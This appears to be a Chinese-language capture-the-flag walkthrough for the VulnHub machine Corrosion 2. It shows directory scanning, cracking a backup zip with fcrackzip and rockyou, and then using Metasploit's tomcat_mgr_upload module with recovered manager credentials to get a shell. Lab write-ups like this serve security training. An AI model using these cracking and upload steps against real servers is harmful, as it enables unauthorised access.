vulhub-corrosion2靶機

1.安裝靶機

https://download.vulnhub.com/corrosion/Corrosion2.ovahttps://download.vulnhub.com/corrosion/Corrosion2.ova

首先訪問一下80端口

訪問一個8080端口發現是一個apache的頁面

那么我們掃描一下目錄

80端口沒有掃描到東西，這里我們掃描8080

掃描到一個壓縮包還有readme.txt，還有一些別的目錄，我們訪問一下看看有沒有有用的信息

說服務器上有個文件還有密碼，我們去看一下那個壓縮包，發現解壓需要密碼，我們使用kali的工具爆破一下

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip

@administrator_hi5

然后去解壓看一下里面的內容

找到兩組登錄用戶和密碼

然后使用msfconsole獲取shell

use exploit/multi/http/tomcat_mgr_upload
set RHOST 192.168.248.145
set HttpUsername  manager
set HttpPassword  melehifokivai

然后run

輸入shell，就可以執行命令了

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/pingmian/91731.shtml
繁體地址，請注明出處：http://hk.pswp.cn/pingmian/91731.shtml
英文地址，請注明出處：http://en.pswp.cn/pingmian/91731.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！